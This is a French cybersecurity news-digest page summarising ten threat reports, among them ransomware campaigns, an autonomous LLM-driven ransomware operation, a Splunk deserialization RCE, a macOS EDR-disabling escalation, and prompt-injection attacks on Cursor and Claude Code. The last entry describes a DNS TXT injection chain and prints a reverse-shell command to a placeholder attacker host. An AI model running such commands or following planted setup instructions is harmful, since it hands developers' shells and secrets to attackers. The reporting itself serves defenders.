Anubis Ransomware : exploitation de CitrixBleed 2 et abus d'outils RMM légitimes

🔍 Contexte PubliĂ© le 1er juillet 2026 par Arctic Wolf sur leur blog de recherche, cet article prĂ©sente les rĂ©sultats d’investigations menĂ©es tout au long de 2026 sur plusieurs intrusions attribuĂ©es au groupe Anubis ransomware, opĂ©rant selon un modĂšle Ransomware-as-a-Service (RaaS). 🎯 Acteur de menace Anubis est un groupe RaaS disposant d’un programme d’affiliation. Le rapport couvre des comportements observĂ©s Ă  travers plusieurs intrusions distinctes, reflĂ©tant le tradecraft de diffĂ©rents affiliĂ©s plutĂŽt qu’un opĂ©rateur unique et uniforme. ...

8 juillet 2026 Â· 2 min

JadePuffer : premier ransomware entiÚrement piloté par un agent IA autonome documenté

📅 Source : BleepingComputer, 4 juillet 2026 — Analyse publiĂ©e par la sociĂ©tĂ© de sĂ©curitĂ© cloud Sysdig portant sur une opĂ©ration ransomware inĂ©dite baptisĂ©e JadePuffer. đŸ€– Contexte : JadePuffer est prĂ©sentĂ© comme le premier cas documentĂ© d’opĂ©ration ransomware entiĂšrement orchestrĂ©e par un agent LLM autonome, sans intervention humaine directe identifiĂ©e. L’agent a gĂ©rĂ© l’ensemble de la chaĂźne d’attaque, de la reconnaissance initiale au chiffrement des donnĂ©es. 🔓 Vecteur d’accĂšs initial : exploitation de CVE-2025-3248, une vulnĂ©rabilitĂ© d’exĂ©cution de code Ă  distance non authentifiĂ©e dans Langflow, un framework open-source de construction d’applications LLM. Cette CVE avait Ă©tĂ© corrigĂ©e le 1er avril 2025 et signalĂ©e comme activement exploitĂ©e par la CISA dĂ©but mai 2025. ...

8 juillet 2026 Â· 3 min

Sept vulnérabilités dans FatFs : impact massif sur l'IoT, l'OT et les systÚmes embarqués

🔍 Contexte PubliĂ© le 1er juillet 2026 par runZero (todb / HD Moore), cet article de recherche documente la dĂ©couverte de sept vulnĂ©rabilitĂ©s dans FatFs, une bibliothĂšque FAT open-source embarquĂ©e trĂšs rĂ©pandue. La recherche a Ă©tĂ© initiĂ©e en mars 2026 en reprenant un audit manuel de 2017, cette fois avec l’aide de GitHub Copilot en mode automatique pour gĂ©nĂ©rer des fuzzers et valider l’exploitabilitĂ©. 🐛 VulnĂ©rabilitĂ©s identifiĂ©es Les sept CVEs sont listĂ©es par ordre de criticitĂ© : ...

3 juillet 2026 Â· 3 min

DuneSlide : Deux vulnérabilités RCE critiques via injection de prompt dans Cursor IDE

🔍 Contexte PubliĂ© le 1er juillet 2026 par Cato AI Labs (blog Cato Networks), cet article prĂ©sente la dĂ©couverte de deux vulnĂ©rabilitĂ©s critiques dans Cursor IDE, un environnement de dĂ©veloppement intĂ©grĂ© basĂ© sur l’IA utilisĂ© par plus de la moitiĂ© des entreprises du Fortune 500. 🚹 VulnĂ©rabilitĂ©s identifiĂ©es Les deux vulnĂ©rabilitĂ©s, regroupĂ©es sous le nom DuneSlide, ont obtenu un score CVSS de 9.8 et ont Ă©tĂ© assignĂ©es les identifiants CVE-2026-50548 et CVE-2026-50549. ...

2 juillet 2026 Â· 3 min

AsyncRAT Family : cartographie de 40 variants RAT et leur infrastructure C2 active

📅 Source : Censys Blog, publiĂ© le 26 juin 2026, par Aidan Holland (Senior Security Researcher, Censys ARC). Contexte AsyncRAT est un cheval de Troie d’accĂšs distant (RAT) open-source pour Windows, publiĂ© en janvier 2019 par le dĂ©veloppeur NYAN-x-CAT sur GitHub. Il constitue la racine d’une famille de malwares ayant engendrĂ© environ 40 variants nommĂ©s Ă  travers trois gĂ©nĂ©rations de forks successifs. Arbre gĂ©nĂ©alogique de la famille La lignĂ©e s’organise ainsi : ...

30 juin 2026 Â· 3 min

macOS : escalade de privilĂšges via exploitation du cache CDHash XPC et injection NIB

🔍 Contexte PubliĂ© le 24 juin 2026 par Hillel Pinto (XM Cyber), cet article prĂ©sente une nouvelle technique d’escalade de privilĂšges macOS permettant Ă  un compte utilisateur standard de dĂ©sactiver des solutions de sĂ©curitĂ© d’entreprise (EDR, MDM) sans droits administrateur, sans exploit noyau et sans dĂ©clencher d’alertes. ⚙ MĂ©canisme technique L’attaque repose sur une chaĂźne d’exploitation en plusieurs Ă©tapes : Exploitation du cache CDHash noyau : un binaire signĂ© lĂ©gitime est lancĂ© pour peupler le cache de confiance du noyau, puis la structure du bundle applicatif est modifiĂ©e pour injecter un payload NIB (Interface Builder) malveillant. HĂ©ritage du contexte de confiance : le code malveillant s’exĂ©cute dans l’espace mĂ©moire du composant signĂ© lĂ©gitime, hĂ©ritant de ses credentials de confiance noyau, ce qui lui permet de communiquer avec les daemons privilĂ©giĂ©s sans authentification. Bridge Objective-C via JXA : pour contourner les limitations d’AppleScript, un bridge multi-Ă©tapes est construit : chargement de OSAKit.framework, transition vers JavaScript for Automation (JXA), accĂšs au bridge Objective-C, manipulation de malloc/free, dispatch_block_create, objc_msgSend, et spoofing de structures Block_layout. MĂ©thodes XPC exposĂ©es exploitĂ©es : runProcessWithCommand:, terminateAppsAndAgents:, ceaseSystemExtensionWithReply: 🎯 Produits impactĂ©s CrowdStrike Falcon Sensor : dĂ©chargement complet du capteur depuis un compte UID 502, terminaison de la surveillance des processus et de la visibilitĂ© rĂ©seau. → DĂ©tection et prĂ©vention ajoutĂ©es, bounty payĂ©. Kandji MDM Agent : dĂ©sactivation permanente via une chaĂźne XPC en deux phases, suppression des gardes EDR et terminaison de l’extension Endpoint Security Framework (ESF). → CVE-2026-39118 assignĂ©, bounty payĂ©, correctif dĂ©ployĂ©. đŸ› ïž Outil associĂ© Le chercheur a dĂ©veloppĂ© XPC Hunter, un framework open-source automatisĂ© de dĂ©couverte des surfaces d’escalade de privilĂšges XPC sur toutes les applications macOS installĂ©es. Sa prĂ©sentation est prĂ©vue Ă  Black Hat US en aoĂ»t 2026. ...

30 juin 2026 Â· 3 min

StegoAd : 119 extensions malveillantes Edge ciblant 2,6 millions d'utilisateurs via stéganographie

🔍 Contexte Le 16 juin 2026, l’équipe Microsoft Edge Extensions Security a publiĂ© une analyse technique dĂ©taillĂ©e de la campagne StegoAd, un portmanteau de steganography et adware. Active depuis au moins 2021, cette campagne a atteint sa phase la plus sophistiquĂ©e entre mars 2024 et avril 2026, impactant environ 2,6 millions d’utilisateurs via 119 extensions malveillantes publiĂ©es sur le Microsoft Edge Add-ons Store. 🎯 Nature de la menace StegoAd est une plateforme de monĂ©tisation et de vol de credentials opĂ©rĂ©e par un acteur non nommĂ© utilisant plus de 90 comptes dĂ©veloppeurs jetables. Les extensions se font passer pour des outils lĂ©gitimes (bloqueurs de publicitĂ©s, VPN, tĂ©lĂ©chargeurs vidĂ©o, traducteurs) tout en embarquant des charges utiles malveillantes activĂ©es aprĂšs un dĂ©lai de dormance de 3 Ă  5,5 jours. ...

30 juin 2026 Â· 6 min

Cellebrite utilisé par les autorités russes pour réprimer l'activiste Andrey Pivovarov

🔍 Contexte PubliĂ© le 25 juin 2026 par le Citizen Lab (UniversitĂ© de Toronto), ce rapport prĂ©sente une analyse forensique dĂ©taillĂ©e de l’utilisation de l’outil Cellebrite UFED par les autoritĂ©s russes contre l’activiste politique Andrey Pivovarov, ancien directeur de l’ONG Open Russia. đŸ“± Incident principal Le 31 mai 2021, Pivovarov est arrĂȘtĂ© Ă  l’aĂ©roport de Saint-PĂ©tersbourg. Ses appareils (iPhone 12 et MacBook) sont confisquĂ©s. L’analyse forensique rĂ©vĂšle avec haute confiance que Cellebrite UFED a Ă©tĂ© utilisĂ© le 17 juin 2021 pour extraire les donnĂ©es de son iPhone, via une connexion USB identifiĂ©e par un Host ID Cellebrite (9016926980658937761372207). ...

29 juin 2026 Â· 3 min

CVE-2026-20251 : RCE via désérialisation jsonpickle dans Splunk Secure Gateway (CVSS 8.8)

🔍 Contexte PubliĂ© le 29 juin 2026 sur GitHub par le chercheur Fady Oueslati (ReactiveZero Security Research), ce dĂ©pĂŽt documente la vulnĂ©rabilitĂ© CVE-2026-20251 affectant Splunk Secure Gateway (SSG), avec un score CVSS 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Un patch est disponible. 🐛 VulnĂ©rabilitĂ© La faille repose sur une dĂ©sĂ©rialisation non sĂ©curisĂ©e via jsonpickle dans le composant SSG. Le flux d’exploitation est le suivant : Un attaquant authentifiĂ© (faibles privilĂšges) Ă©crit un document malveillant dans la collection KV Store mobile_alerts via l’API REST Splunk. SSG lit ce document dans alerts_request_processor.py et le soumet au validateur check_alert_data_valid_json(). Le validateur court-circuite dĂšs qu’il rencontre la clĂ© py/object avec une valeur commençant par spacebridgeapp, retournant True sans inspecter les clĂ©s suivantes. Le document est ensuite passĂ© Ă  jsonpickle.decode(..., safe=True), qui exĂ©cute le gadget py/reduce prĂ©sent dans la clĂ© notification — le flag safe=True ne bloque pas ce chemin de code. 🎯 Impact ExĂ©cution de code arbitraire en tant que compte de service Splunk NĂ©cessite uniquement un login Splunk valide Ă  faibles privilĂšges ConfidentialitĂ©, intĂ©gritĂ© et disponibilitĂ© toutes compromises 📩 Versions affectĂ©es Branche CorrigĂ© dans SSG 3.9.x 3.9.20 SSG 3.10.x 3.10.6 SSG 3.8.x 3.8.67 Splunk Enterprise 10.0.7 / 10.2.4 / 10.4.0+ Instance testĂ©e : SSG 3.9.19 sur Splunk Enterprise 10.0.6 (macOS x86_64). ...

29 juin 2026 Â· 2 min

Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt

🔍 Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique d’une attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code d’Anthropic. ⚙ MĂ©canisme de l’attaque L’attaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError s’il n’est pas initialisĂ©, incitant l’agent Ă  exĂ©cuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă  bash -c. L’enregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đŸ’„ Impact Shell interactif s’exĂ©cutant avec les droits de l’utilisateur dĂ©veloppeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par l’agent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă  tout moment en Ă©ditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre d’emploi, un tutoriel ou un message Slack suffit Ă  compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...

29 juin 2026 Â· 3 min
DerniĂšre mise Ă  jour le: 19 aoĂ»t 2026 📝